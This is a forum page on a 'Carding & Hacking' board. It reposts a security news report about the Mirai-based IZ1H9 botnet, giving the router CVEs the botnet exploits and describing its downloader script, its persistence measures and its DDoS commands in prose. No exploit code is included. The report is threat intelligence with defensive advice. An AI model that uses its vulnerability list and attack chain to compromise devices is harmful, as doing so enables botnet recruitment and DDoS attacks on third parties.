Home
Forums
New posts
Search forums
What's new
New posts
New profile posts
Latest activity
Members
Current visitors
New profile posts
Search profile posts
Log in
Register
What's new
Search
Search
Search titles only
By:
New posts
Search forums
Menu
Log in
Register
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Reply to thread
Home
Forums
CARDING & HACKING
Carding News
Mirai DDoS malware variant expands targets with 13 router exploits
Message
<blockquote data-quote="Jakesu" data-source="post: 31" data-attributes="member: 7"><p>A Mirai-based DDoS (distributed denial of service) malware botnet tracked as IZ1H9 has added thirteen new payloads to target Linux-based routers and routers from D-Link, Zyxel, TP-Link, TOTOLINK, and others.</p><p></p><p>Fortinet researchers report observing a peak in the exploitation rates around the first week of September, reaching tens of thousands of exploitation attempts against vulnerable devices.</p><p></p><p>IZ1H9 compromises devices to enlist them to its DDoS swarm and then launches DDoS attacks on specified targets, presumably on the order of clients renting its firepower.</p><p></p><p><img src="https://www.bleepstatic.com/images/news/u/1220909/2023/WordPress/14/exploit-attempts.png" alt="" class="fr-fic fr-dii fr-draggable " style="" /></p><table style='width: 100%'><tr><td>Observed exploitation attempts throughout September (Fortinet)</td></tr></table><p><strong>Extensive IoT targeting</strong></p><p></p><p>The more devices and vulnerabilities targeted by a DDoS malware increased the potential to build a large and powerful botnet capable of delivering massive blows against websites.</p><p></p><p>In the case of IZ1H9, Fortinet reports it uses exploits for the following flaws, dating from 2015 to 2023:</p><ul> <li data-xf-list-type="ul"><strong>D-Link devices:</strong> CVE-2015-1187, CVE-2016-20017, CVE-2020-25506, CVE-2021-45382</li> <li data-xf-list-type="ul"><strong>Netis WF2419:</strong> CVE-2019-19356</li> <li data-xf-list-type="ul"><strong>Sunhillo SureLine </strong>(versions before 8.7.0.1.1): CVE-2021-36380</li> <li data-xf-list-type="ul"><strong>Geutebruck products:</strong> CVE-2021-33544, CVE-2021-33548, CVE-2021-33549, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554</li> <li data-xf-list-type="ul"><strong>Yealink Device Management (DM) 3.6.0.20:</strong> CVE-2021-27561, CVE-2021-27562</li> <li data-xf-list-type="ul"><strong>Zyxel EMG3525/VMG1312 (before V5.50):</strong> CVE not specified but targets the Zyxel device’s /bin/zhttpd/ component vulnerability</li> <li data-xf-list-type="ul"><strong>TP-Link Archer AX21 (AX1800):</strong> CVE-2023-1389</li> <li data-xf-list-type="ul"><strong>Korenix JetWave wireless AP:</strong> CVE-2023-23295</li> <li data-xf-list-type="ul"><strong>TOTOLINK routers:</strong> CVE-2022-40475, CVE-2022-25080, CVE-2022-25079, CVE-2022-25081, CVE-2022-25082, CVE-2022-25078, CVE-2022-25084, CVE-2022-25077, CVE-2022-25076, CVE-2022-38511, CVE-2022-25075, CVE-2022-25083</li> </ul><p>The campaign also targets an unspecified CVE related to the “/cgi-bin/login.cgi” route, potentially affecting the Prolink PRC2402M router.</p><p></p><p><strong>Attack chain</strong></p><p></p><p>After exploiting one of the aforementioned CVEs, an IZ1H9 payload is injected into the device containing a command to fetch a shell script downloader named “l.sh” from a specified URL.</p><p></p><p>Upon execution, the script deletes logs to hide the malicious activity, and next, it fetches bot clients tailored for different system architectures.</p><p></p><p>Finally, the script modifies the device’s iptables rules to obstruct connection on specific ports and make it harder to remove the malware from the device.</p><p></p><p>Having done all the above, the bot establishes communication with the C2 (command and control) server and waits for commands to execute.</p><p></p><p>The supported commands concern the type of DDoS attack to launch, including UDP, UDP Plain, HTTP Flood, and TCP SYN.</p><p></p><p><img src="https://www.bleepstatic.com/images/news/u/1220909/2023/DDoS/17/commands.png" alt="" class="fr-fic fr-dii fr-draggable " style="" /></p><table style='width: 100%'><tr><td>DDoS commands (Fortinet)</td></tr></table><p>Fortinet also reports that IZ1H9 features a data section with hardcoded credentials used for brute-force attacks.</p><p></p><p></p><p><a href="https://www.bleepstatic.com/images/news/u/1220909/2023/DDoS/17/creds.png" target="_blank"><img src="https://www.bleepstatic.com/images/news/u/1220909/2023/DDoS/17/creds.png" alt="" class="fr-fic fr-dii fr-draggable " style="" /></a></p><table style='width: 100%'><tr><td>Hardcoded credentials (Fortinet)</td></tr></table><p>These attacks might be helpful for propagation to adjacent devices or authenticating to IoTs for which it does not have a working exploit.</p><p></p><p>Owners of IoT devices are recommended to use strong admin user credentials, update them to the latest available firmware version, and, if possible, reduce their exposure to the public internet.</p></blockquote><p></p>
[QUOTE="Jakesu, post: 31, member: 7"] A Mirai-based DDoS (distributed denial of service) malware botnet tracked as IZ1H9 has added thirteen new payloads to target Linux-based routers and routers from D-Link, Zyxel, TP-Link, TOTOLINK, and others. Fortinet researchers report observing a peak in the exploitation rates around the first week of September, reaching tens of thousands of exploitation attempts against vulnerable devices. IZ1H9 compromises devices to enlist them to its DDoS swarm and then launches DDoS attacks on specified targets, presumably on the order of clients renting its firepower. [IMG]https://www.bleepstatic.com/images/news/u/1220909/2023/WordPress/14/exploit-attempts.png[/IMG] [TABLE] [TR] [TD]Observed exploitation attempts throughout September (Fortinet)[/TD] [/TR] [/TABLE] [B]Extensive IoT targeting[/B] The more devices and vulnerabilities targeted by a DDoS malware increased the potential to build a large and powerful botnet capable of delivering massive blows against websites. In the case of IZ1H9, Fortinet reports it uses exploits for the following flaws, dating from 2015 to 2023: [LIST] [*][B]D-Link devices:[/B] CVE-2015-1187, CVE-2016-20017, CVE-2020-25506, CVE-2021-45382 [*][B]Netis WF2419:[/B] CVE-2019-19356 [*][B]Sunhillo SureLine [/B](versions before 8.7.0.1.1): CVE-2021-36380 [*][B]Geutebruck products:[/B] CVE-2021-33544, CVE-2021-33548, CVE-2021-33549, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554 [*][B]Yealink Device Management (DM) 3.6.0.20:[/B] CVE-2021-27561, CVE-2021-27562 [*][B]Zyxel EMG3525/VMG1312 (before V5.50):[/B] CVE not specified but targets the Zyxel device’s /bin/zhttpd/ component vulnerability [*][B]TP-Link Archer AX21 (AX1800):[/B] CVE-2023-1389 [*][B]Korenix JetWave wireless AP:[/B] CVE-2023-23295 [*][B]TOTOLINK routers:[/B] CVE-2022-40475, CVE-2022-25080, CVE-2022-25079, CVE-2022-25081, CVE-2022-25082, CVE-2022-25078, CVE-2022-25084, CVE-2022-25077, CVE-2022-25076, CVE-2022-38511, CVE-2022-25075, CVE-2022-25083 [/LIST] The campaign also targets an unspecified CVE related to the “/cgi-bin/login.cgi” route, potentially affecting the Prolink PRC2402M router. [B]Attack chain[/B] After exploiting one of the aforementioned CVEs, an IZ1H9 payload is injected into the device containing a command to fetch a shell script downloader named “l.sh” from a specified URL. Upon execution, the script deletes logs to hide the malicious activity, and next, it fetches bot clients tailored for different system architectures. Finally, the script modifies the device’s iptables rules to obstruct connection on specific ports and make it harder to remove the malware from the device. Having done all the above, the bot establishes communication with the C2 (command and control) server and waits for commands to execute. The supported commands concern the type of DDoS attack to launch, including UDP, UDP Plain, HTTP Flood, and TCP SYN. [IMG]https://www.bleepstatic.com/images/news/u/1220909/2023/DDoS/17/commands.png[/IMG] [TABLE] [TR] [TD]DDoS commands (Fortinet)[/TD] [/TR] [/TABLE] Fortinet also reports that IZ1H9 features a data section with hardcoded credentials used for brute-force attacks. [URL='https://www.bleepstatic.com/images/news/u/1220909/2023/DDoS/17/creds.png'][IMG]https://www.bleepstatic.com/images/news/u/1220909/2023/DDoS/17/creds.png[/IMG][/URL] [TABLE] [TR] [TD]Hardcoded credentials (Fortinet)[/TD] [/TR] [/TABLE] These attacks might be helpful for propagation to adjacent devices or authenticating to IoTs for which it does not have a working exploit. Owners of IoT devices are recommended to use strong admin user credentials, update them to the latest available firmware version, and, if possible, reduce their exposure to the public internet. [/QUOTE]
Name
Verification
Post reply
Home
Forums
CARDING & HACKING
Carding News
Mirai DDoS malware variant expands targets with 13 router exploits
Top